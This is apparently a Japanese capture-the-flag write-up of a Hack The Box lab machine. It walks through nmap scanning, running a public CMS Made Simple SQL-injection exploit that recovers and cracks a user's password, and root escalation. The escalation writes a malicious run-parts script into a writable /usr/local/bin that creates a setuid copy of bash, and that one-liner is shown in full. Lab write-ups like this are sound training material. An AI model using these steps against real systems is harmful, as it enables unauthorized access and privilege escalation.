◆userフラグを回収
1.nmap
===
nmap-tcp.log 10.10.10.138
Nmap scan report for 10.10.10.138
Host is up, received echo-reply ttl 63 (0.26s latency).
Scanned at 2022-09-17 13:40:32 JST for 37s
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKBbBK0GkiCbxmAbaYsF4DjDQ3JqErzEazl3v8OndVhynlxNA5sMnQmyH+7ZPdDx9IxvWFWkdvPDJC0rUj1CzOTOEjN61Qd7uQbo5x4rJd3PAgqU21H9NyuXt+T1S/Ud77xKei7fXt5kk1aL0/mqj8wTk6HDp0ZWrGBPCxcOxfE7NBcY3W++IIArn6irQUom0/AAtR3BseOf/VTdDWOXk/Ut3rrda4VMBpRcmTthjsTXAvKvPJcaWJATtRE2NmFjBWixzhQU+s30jPABHcVtxl/Fegr3mvS7O3MpPzoMBZP6Gw8d/bVabaCQ1JcEDwSBc9DaLm4cIhuW37dQDgqT1V
| 256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPzrVwOU0bohC3eXLnH0Sn4f7UAwDy7jx4pS39wtkKMF5j9yKKfjiO+5YTU//inmSjlTgXBYNvaC3xfOM/Mb9RM=
| 256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEuLLsM8u34m/7Hzh+yjYk4pu3WHsLOrPU2VeLn22UkO
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.25 *1
| http-robots.txt: 1 disallowed entry
|_/writeup/
|_http-title: Nothing here yet.
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
===
2.80番ポートにアクセス
注意:BruteforseをするとIPが1分間ブロックされてしまうので、以下を調べた。
3.writeupのディレクトリにアクセス
4.burpでレスポンスを見てみると、CMS Made Simpleが使用されていることがわかる。
私は基本的にサイトにアクセスするときは、burpを使用することが多い。
5.searchsploitでエクスプロイトを検索すると
SQLiのエクスプロイト(46635.py)があったのでそれを使う。
※Python2で書かれているため、セットアップしておいたほうが良い。
▼実行結果
===
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
[+] Password cracked: raykayjay9
===
6.sshを行いuser.txtを開きflag回収。
◆rootフラグを回収
1.列挙のためlinpeasとpspyをアップロード
このアップロード方法ではscpコマンドを使用して/tmpに各ファイルを置いた。
2.linpeasを実行
実行結果の中にjkrユーザは、staffという名前のグループに属されていることに気が付いた。
そこでグーグルを使用して調べてみたところ以下の記事を見つけた。
以下の結果から/usr/local/binが赤くなっていたので、ls -ldをしてパーミッションの確認を行った。
書き込み権限があることが分かった。
3.pspyを実行
pspyを実行したまま、別のターミナルからsshを行ってみたところ以下の出力があった。
4.run-partsをハイジャックするために、以下の以下の方法で行う。
echo -e '#!/bin/bash\n\ncp /bin/bash /bin/alien\nchmod u+s /bin/alien' > /usr/local/bin/run-parts; chmod +x /usr/local/bin/run-parts
1.cpコマンドを利用して/bin/bashを/bin/alienにコピーを行う。
2./bin/alienに対して、u+sでrootとして実行されるようにする。
3. それを/usr/local/bin/run-partsに書き込む
4.さらにrun-partsへ実行権限を与える。
5.別のターミナルからsshで接続する。
完了したら、以下のコマンドを実行してroot権限へ昇格できる。
